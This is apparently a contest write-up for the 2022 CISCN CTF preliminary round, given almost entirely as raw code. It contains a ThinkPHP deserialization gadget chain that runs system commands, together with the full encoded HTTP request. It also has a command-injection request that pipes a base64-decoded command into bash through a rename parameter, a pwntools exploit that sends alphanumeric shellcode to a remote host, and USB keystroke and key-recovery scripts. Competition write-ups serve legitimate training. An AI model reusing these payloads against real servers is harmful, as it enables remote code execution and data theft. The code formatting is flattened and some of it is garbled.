2022 CISCN全国初赛-wp

<?phpnamespace think{abstract class Model{private $lazySave = false;private $data = [];private $exists = false;protected $table;private $withAttr = [];protected $json = [];protected $jsonAssoc = false;function __construct($obj = ''){$this->lazySave = True;$this->data = ['whoami' => ['cat /flag*']];$this->exists = True;$this->table = $obj;$this->withAttr = ['whoami' => ['system']];$this->json = ['whoami',['whoami']];$this->jsonAssoc = True; } }}namespace thinkmodel{use thinkModel;class Pivot extends Model{ }}namespace{echo(urlencode(serialize(new thinkmodelPivot(new thinkmodelPivot()))));}

POST /index.php/index/test HTTP/1.1Host: eci-2zecfqrktxe0xgdpn16s.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: __jsluid_h=55c4791469c8ac5459a63d8da19ca192Upgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1Content-Type: application/x-www-form-urlencodedContent-Length: 1249a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22cat+%2Fflag%2A%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22cat+%2Fflag%2A%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

/admin/%72%65%6e%61%6d%65?oldname=1dd80f2c-ca5e-411d-ad57-b8b95984e444.crt&newname=44.crt"%26%26echo%20Y2F0IC9mbGFnKj5zdWFudmVfZmxhZwo%3d|base64%20-d|bash%26%26echo" HTTP/1.1Host: adminAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

/admin/%72%65%6e%61%6d%65?oldname=97672333-1cd8-463f-9b42-e0bec5342147.crt&newname=44.crtHTTP/1.1Host: adminAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

# tshark -r ez_usb.pcapng -T fields -e usb.capdata > usbdata.txtimport os# os.system("tshark -r ez_usb.pcapng -T fields -e usb.capdata > usbdata.txt")normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h","0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q","15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y","1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5","23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>","2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H","0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q","15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y","1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}nums = []keys = open('usbdata.txt')for line in keys:if len(line)!=17: #⾸先过滤掉⿏标等其他设备的USB流量continuenums.append(line[0:2]+line[4:6]) #取⼀、三字节keys.close()output = ""for n in nums:if n[2:4] == "00" :continueif n[2:4] in normalKeys:if n[0:2]=="02": #表示按下了shiftoutput += shiftKeys [n[2:4]]else :output += normalKeys [n[2:4]]else:output += '[unknown]'print('output:' + output)

import requestsc = '1732 2514 1344 0356 0451 6671 0055'.replace(' ','')s = '7636643745943727510026022723'key = ""for i in range(28):key += str((int(c[i]) + int(s[i])) % 10)print(key)

from pwn import*context(os='linux',arch='amd64')context.log_level=Truelibc=ELF('./libc-2.33.so')p=process('./login')p=remote("59.110.105.63",37355)pay="opt:1nmsg:ro0ttnn"p.recv()p.send(pay)pay='''opt:2nmsg:RRYh00AAX1A0hA004X1A4hA00AX1A8QX44Pj0X40PZPjAX4znoNDnRYZnCXAAnrn'''p.recv()p.send(pay)p.interactive()